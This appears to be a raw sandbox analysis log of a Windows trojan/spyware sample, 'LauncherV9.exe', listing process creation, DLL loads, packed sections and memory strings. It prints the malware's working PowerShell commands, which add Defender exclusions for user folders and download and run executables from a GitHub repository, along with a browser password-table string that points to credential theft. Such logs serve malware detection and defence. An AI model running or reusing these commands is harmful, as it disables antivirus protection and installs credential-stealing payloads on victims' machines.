            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_00383D0916_2_00383D09
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0037356016_2_00373560
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0039556016_2_00395560
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_003A155F16_2_003A155F
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0037954016_2_00379540
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_003A05B216_2_003A05B2
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_00377DA016_2_00377DA0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_00390D9016_2_00390D90
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_003BB58016_2_003BB580
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0038EDDC16_2_0038EDDC
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0037CE3016_2_0037CE30
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_003B865016_2_003B8650
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_00380EAB16_2_00380EAB
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_003A0E9316_2_003A0E93
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_003B4ED016_2_003B4ED0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0039D73016_2_0039D730
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0037C71016_2_0037C710
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_00373F0016_2_00373F00
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0038AF0016_2_0038AF00
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0037EFAE16_2_0037EFAE
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_003B37A016_2_003B37A0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_003747E216_2_003747E2
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_003BC7D016_2_003BC7D0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_00378FC016_2_00378FC0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_02E3571216_2_02E35712
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_02E3573316_2_02E35733
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_02E355B316_2_02E355B3
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621BF38F022_2_00007FF621BF38F0
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621BF20B022_2_00007FF621BF20B0
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621BF282022_2_00007FF621BF2820
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621C03AD422_2_00007FF621C03AD4
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621C0FAB022_2_00007FF621C0FAB0
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621C0A1C822_2_00007FF621C0A1C8
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621C1316022_2_00007FF621C13160
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621C1640422_2_00007FF621C16404
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621C02B7C22_2_00007FF621C02B7C
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621BF239022_2_00007FF621BF2390
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621C0DBAC22_2_00007FF621C0DBAC
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621C196CC22_2_00007FF621C196CC
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621C0E6C022_2_00007FF621C0E6C0
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621C14EF422_2_00007FF621C14EF4
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621C08E8022_2_00007FF621C08E80
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621BF5E4022_2_00007FF621BF5E40
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621C035C822_2_00007FF621C035C8
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621C17DE822_2_00007FF621C17DE8
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621C06DE022_2_00007FF621C06DE0
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621C02D8022_2_00007FF621C02D80
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621C19D6822_2_00007FF621C19D68
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621C0655C22_2_00007FF621C0655C
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621C0E04022_2_00007FF621C0E040
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621C1200422_2_00007FF621C12004
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621C02F8422_2_00007FF621C02F84
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621C05F9022_2_00007FF621C05F90
            Source: C:\Users\user\AppData\Local\Service.exeCode function: String function: 00007FF621BF8400 appears 31 times
            Source: C:\Users\user\AppData\Local\dll.exeCode function: String function: 0037B350 appears 34 times
            Source: jaclo.exe.12.drStatic PE information: Section: ZLIB complexity 0.9994480298913043
            Source: jaclo.exe.12.drStatic PE information: Section: ZLIB complexity 0.9970703125
            Source: jaclo.exe.12.drStatic PE information: Section: ZLIB complexity 1.0008951822916667
            Source: jaclo.exe.12.drStatic PE information: Section: .data ZLIB complexity 0.9964956758324236
            Source: dll.exe.15.drStatic PE information: Section: ZLIB complexity 0.998801763803681
            Source: dll.exe.15.drStatic PE information: Section: ZLIB complexity 1.00048828125
            Source: dll.exe.15.drStatic PE information: Section: ZLIB complexity 0.9930826822916666
            Source: dll.exe.15.drStatic PE information: Section: .data ZLIB complexity 0.997007548679194
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@27/18@17/7
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\dll.exeJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mov3kju2.sn0.ps1Jump to behavior
            Source: LauncherV9.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\zjxbeopkqt\jaclo.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: dll.exe, 00000010.00000003.1449494477.0000000004039000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472831625.0000000004039000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1473572942.000000000410E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: LauncherV9.exeVirustotal: Detection: 49%
            Source: LauncherV9.exeReversingLabs: Detection: 38%
            Source: unknownProcess created: C:\Users\user\Desktop\LauncherV9.exe "C:\Users\user\Desktop\LauncherV9.exe"
            Source: C:\Users\user\Desktop\LauncherV9.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\LauncherV9.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\Desktop\LauncherV9.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'"
            Source: C:\Users\user\Desktop\LauncherV9.exeProcess created: C:\zjxbeopkqt\jaclo.exe "C:\zjxbeopkqt\jaclo.exe"
            Source: C:\Users\user\Desktop\LauncherV9.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'"
            Source: C:\Users\user\Desktop\LauncherV9.exeProcess created: C:\Users\user\AppData\Local\dll.exe "C:\Users\user\AppData\Local\dll.exe"
            Source: C:\Users\user\Desktop\LauncherV9.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/Service.exe' -OutFile 'C:\Users\user\AppData\Local\Service.exe'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/Service.exe' -OutFile 'C:\Users\user\AppData\Local\Service.exe'"
            Source: C:\Users\user\Desktop\LauncherV9.exeProcess created: C:\Users\user\AppData\Local\Service.exe "C:\Users\user\AppData\Local\Service.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Local\Service.exe "C:\Users\user\AppData\Local\Service.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Local\Service.exe "C:\Users\user\AppData\Local\Service.exe"
            Source: C:\Users\user\Desktop\LauncherV9.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'"Jump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'"Jump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeProcess created: C:\zjxbeopkqt\jaclo.exe "C:\zjxbeopkqt\jaclo.exe" Jump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'"Jump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeProcess created: C:\Users\user\AppData\Local\dll.exe "C:\Users\user\AppData\Local\dll.exe" Jump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/Service.exe' -OutFile 'C:\Users\user\AppData\Local\Service.exe'"Jump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeProcess created: C:\Users\user\AppData\Local\Service.exe "C:\Users\user\AppData\Local\Service.exe" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/Service.exe' -OutFile 'C:\Users\user\AppData\Local\Service.exe'"
            Source: C:\Users\user\Desktop\LauncherV9.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: version.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: wldp.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: profapi.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: webio.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: schannel.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
